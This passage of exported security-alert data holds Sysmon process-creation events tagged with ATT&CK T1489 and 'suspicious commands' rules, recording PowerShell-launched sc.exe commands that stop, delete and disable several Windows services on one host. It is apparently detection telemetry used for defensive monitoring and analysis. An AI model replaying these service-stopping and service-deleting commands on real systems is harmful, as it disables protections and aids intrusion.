@ 14:18:28.591",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.168 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-00106ed61d00} +ProcessId: 5556 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.172053400Z"",""eventRecordID"":""2327"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.168\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-00106ed61d00}\r\nProcessId: 5556\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.168"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-00106ed61d00}"",""processId"":""5556"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.527",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.118 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001082d31d00} +ProcessId: 6012 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.122200900Z"",""eventRecordID"":""2324"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.118\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001082d31d00}\r\nProcessId: 6012\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.118"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001082d31d00}"",""processId"":""6012"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.490",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.089 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010ecd11d00} +ProcessId: 2580 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.091510500Z"",""eventRecordID"":""2322"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.089\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010ecd11d00}\r\nProcessId: 2580\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.089"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010ecd11d00}"",""processId"":""2580"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.474",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.074 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001023d11d00} +ProcessId: 2116 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.076634400Z"",""eventRecordID"":""2321"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.074\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001023d11d00}\r\nProcessId: 2116\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.074"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001023d11d00}"",""processId"":""2116"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.292",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.011 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-00102ece1d00} +ProcessId: 2280 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.020347700Z"",""eventRecordID"":""2318"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.011\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-00102ece1d00}\r\nProcessId: 2280\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WmdnPnSN\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.011"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-00102ece1d00}"",""processId"":""2280"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WmdnPnSN"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.228",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.960 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-00102bcb1d00} +ProcessId: 4200 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop \gm +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \\gm",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.964921900Z"",""eventRecordID"":""2315"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.960\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-00102bcb1d00}\r\nProcessId: 4200\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \\gm\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.960"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-00102bcb1d00}"",""processId"":""4200"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\\gm"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.215",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.945 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-001046ca1d00} +ProcessId: 7328 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config \gm Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo 